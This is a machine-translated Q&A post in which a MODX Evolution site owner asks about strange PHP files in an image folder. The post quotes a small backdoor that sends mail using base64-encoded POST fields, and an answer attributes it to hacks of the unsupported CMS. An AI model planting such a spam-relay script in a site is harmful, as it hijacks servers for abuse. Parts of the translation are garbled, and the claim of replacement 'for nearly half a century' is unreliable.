MODX evo - 에셋 이미지 폴더의 이러한 버그가 있습니까?

Question

내 modx 자산에 이상한 PHP 파일이 있습니다 - 내가 그들을 열 경우, 코드가 이미지에 관련된 것 같지 않습니다> 이미지

cklxt.php.php.php.php 
cklxt.php.php.php.php.php 

:

<?php 
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb'])); 
$xuoh = stripslashes(base64_decode($_POST['maih'])); 
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepouebon'])); 
$yflalhugo = stripslashes(base64_decode($_POST['cdcftxzkyrg'])); 
$nzcbxor = mail(stripslashes($ixhpq), stripslashes($xuoh), stripslashes($iglrhrluhvqgr), stripslashes($yflalhugo)); 
if($nzcbxor){echo 'nlewxnrsdqxow';} else {echo 'qhguq : ' . $nzcbxor;} 

많은있다 more ...

이러한 PHP 파일이 있습니까? 또는 버그가 있거나 사이트가 해킹 당했습니까?

Answer 1

Evolution CMS는 더 이상 공식적으로 MODX에서 지원되지 않습니다. 11 월에 일련의 나쁜 해킹이 있었고 코드 기반을 담당하는 커뮤니티의 반응이 느립니다. 결국 패치가 릴리스되었지만 수백 가지의 다른 코드가 변경되었습니다. 이러한 해킹을 방지하기위한 임시 해결책이 많이 있지만 진화 개발자에게 문의하여 사이트를 정상 상태로 되 돌리는 것이 가장 좋습니다.

11 세 이상이고 약 12 ​​개의 CVE 만 있었기 때문에 비난하지는 않겠습니다. 그것은 구식이고, 패치가 적용되지 않았으며 거의 ​​반세기 동안 혁명으로 대체되었습니다.